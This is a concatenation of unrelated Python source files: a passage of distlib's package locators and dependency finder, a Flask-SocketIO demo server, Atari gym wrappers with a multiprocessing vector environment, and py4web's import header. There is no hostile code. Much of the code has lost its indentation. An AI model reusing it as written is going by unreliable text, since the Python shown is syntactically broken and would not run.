odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\s*=\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\s\n]*))\s+)?
href\s*=\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\s\n]*))
(\s+rel\s*=\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
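
# A minimal sketch of how Page is consumed by the scraping locator below
# (the HTML snippet is illustrative):
#
#     page = Page('<a rel="download" href="pkg-1.0.tar.gz">pkg</a>',
#                 'https://example.com/simple/pkg/')
#     page.links  # -> [('https://example.com/simple/pkg/pkg-1.0.tar.gz',
#                 #      'download')]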
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
        'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
            t.daemon = True
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|'
r'win(32|-amd64)|macosx-?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError:
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e:
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e:
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
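# Usage sketch for SimpleScrapingLocator (assumes network access; the index
# URL and project name below are illustrative):
def _example_simple_scraping_locator():
    locator = SimpleScrapingLocator('https://pypi.python.org/simple/',
                                    timeout=3.0, num_workers=4)
    project = locator.get_project('sarge')
    for version in sorted(k for k in project if k not in ('urls', 'digests')):
        print(version, project['urls'].get(version))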
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path):
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
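# Usage sketch for DirectoryLocator ('/tmp/wheelhouse' is a placeholder for a
# local folder containing sdists/wheels):
def _example_directory_locator():
    locator = DirectoryLocator('/tmp/wheelhouse', recursive=True)
    print(sorted(locator.get_distribution_names()))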
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
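# Typical use of the module-level convenience function (network access is
# assumed and the requirement string is illustrative):
def _example_locate():
    dist = locate('sarge (>= 0.1)')
    if dist is not None:
        print(dist.name_and_version, dist.source_url)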
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
        are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
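# Usage sketch for DependencyFinder (network access assumed; the output
# depends on what the configured locator can see):
def _example_dependency_finder():
    finder = DependencyFinder()
    dists, problems = finder.find('sarge (>= 0.1)')
    for dist in dists:
        print(dist.name_and_version, 'build-time only:', dist.build_time_dependency)
    for problem in problems:
        print('problem:', problem)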
|
socket_test.py
|
from flask import Flask, render_template
from flask_socketio import SocketIO, emit
import logging
import random
from time import sleep
import threading
from os import path
app = Flask(__name__, template_folder=path.dirname(__file__))
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app,cors_allowed_origins="*")
@socketio.on('connect')
def test_connect():
    logging.info('Client connected')
emit('my response', {'data': 'Connected'})
@app.route('/')
def index():
return render_template('socket.html')
@socketio.on('my event')
def test_message(message):
    logging.info(f'The received message is: {message}')
emit('my response', {'data': 'got it!'})
def my_thread(countDown):
for _ in range(countDown):
logging.info('Generating new number...')
num = random.randint(0,100)
        socketio.emit('new data', f'The server generated the value {num} for you')  # server-level emit broadcasts by default
sleep(1)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format='[%(levelname)s] %(message)s'
)
t = threading.Thread(target=my_thread, args=(100,))
t.start()
socketio.run(app)
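# A minimal companion client, as a sketch (run it from a separate process;
# assumes the python-socketio client package is installed):
#
#   import socketio
#   sio = socketio.Client()
#
#   @sio.on('new data')
#   def on_new_data(data):
#       print(data)
#
#   sio.connect('http://localhost:5000')
#   sio.emit('my event', {'hello': 'server'})
#   sio.wait()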
|
atari_wrappers.py
|
import gym
import numpy as np
from collections import deque
from PIL import Image
from multiprocessing import Process, Pipe
# atari_wrappers.py
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def _reset(self):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset()
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(0)
if done:
obs = self.env.reset()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def _reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class ImageSaver(gym.Wrapper):
def __init__(self, env, img_path, rank):
gym.Wrapper.__init__(self, env)
self._cnt = 0
self._img_path = img_path
self._rank = rank
def _step(self, action):
step_result = self.env.step(action)
obs, _, _, _ = step_result
img = Image.fromarray(obs, 'RGB')
img.save('%s/out%d-%05d.png' % (self._img_path, self._rank, self._cnt))
self._cnt += 1
return step_result
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def _step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
            # for Qbert sometimes we stay in lives == 0 condition for a few frames
            # so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def _reset(self):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset()
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
self._skip = skip
def _step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, info
def _reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class ClipRewardEnv(gym.RewardWrapper):
def _reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
gym.ObservationWrapper.__init__(self, env)
self.res = 84
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(self.res, self.res, 1), dtype='uint8')
def _observation(self, obs):
frame = np.dot(obs.astype('float32'), np.array([0.299, 0.587, 0.114], 'float32'))
frame = np.array(Image.fromarray(frame).resize((self.res, self.res),
resample=Image.BILINEAR), dtype=np.uint8)
return frame.reshape((self.res, self.res, 1))
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Buffer observations and stack across channels (last axis)."""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(shp[0], shp[1], k), dtype='uint8')
def _reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
        for _ in range(self.k):
            self.frames.append(ob)
return self._observation()
def _step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._observation(), reward, done, info
def _observation(self):
assert len(self.frames) == self.k
return np.concatenate(self.frames, axis=2)
def wrap_deepmind(env, episode_life=True, clip_rewards=True):
"""Configure environment for DeepMind-style Atari.
Note: this does not include frame stacking!"""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
return env
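# Usage sketch (assumes an older gym release with Atari support, where
# wrappers implement the pre-0.9.6 style _reset/_step methods):
def _example_wrap_deepmind():
    env = gym.make('BreakoutNoFrameskip-v4')
    env = wrap_deepmind(env)   # 84x84 grayscale frames, skip=4, clipped rewards
    env = FrameStack(env, 4)   # stack the last 4 frames along the channel axis
    obs = env.reset()
    print(obs.shape)           # expected: (84, 84, 4)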
# envs.py
def make_env(env_id, img_dir, seed, rank):
def _thunk():
env = gym.make(env_id)
env.seed(seed + rank)
if img_dir is not None:
env = ImageSaver(env, img_dir, rank)
env = wrap_deepmind(env)
env = WrapPyTorch(env)
return env
return _thunk
class WrapPyTorch(gym.ObservationWrapper):
def __init__(self, env=None):
super(WrapPyTorch, self).__init__(env)
self.observation_space = gym.spaces.Box(0.0, 1.0, [1, 84, 84], dtype='float32')
def _observation(self, observation):
return observation.transpose(2, 0, 1)
# vecenv.py
class VecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
# subproc_vec_env.py
def worker(remote, env_fn_wrapper):
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_space, env.observation_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, CloudpickleWrapper(env_fn)))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', None))
self.action_space, self.observation_space = self.remotes[0].recv()
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
# Create the environment.
def make(env_name, img_dir, num_processes):
envs = SubprocVecEnv([
make_env(env_name, img_dir, 1337, i) for i in range(num_processes)
])
return envs
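# Driving the vectorized environment, as a sketch (the env id and process
# count are illustrative; actions are sampled uniformly):
def _example_vec_env():
    envs = make('PongNoFrameskip-v4', img_dir=None, num_processes=4)
    obs = envs.reset()
    for _ in range(10):
        actions = [envs.action_space.sample() for _ in range(envs.num_envs)]
        obs, rewards, dones, infos = envs.step(actions)
    envs.close()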
|
core.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PY4WEB - a web framework for rapid development of efficient database driven web applications"""
# Standard modules
import asyncio
import cgitb
import code
import copy
import datetime
import enum
import functools
import http.client
import http.cookies
import importlib.machinery
import importlib.util
import inspect
import json
import linecache
import logging
import numbers
import os
import pathlib
import platform
import portalocker
import re
import signal
import sys
import threading
import time
import traceback
import types
import urllib.parse
import uuid
import zipfile
import io
from contextlib import redirect_stdout
from collections import OrderedDict
from watchgod import awatch
from . import server_adapters
# Optional web servers for speed
try:
import gunicorn
except ImportError:
gunicorn = None
# Third party modules
import ombott as bottle
import click
import jwt # this is PyJWT
import pluralize
import pydal
import threadsafevariable
import yatl
import renoir
import renoir.constants
import renoir.writers
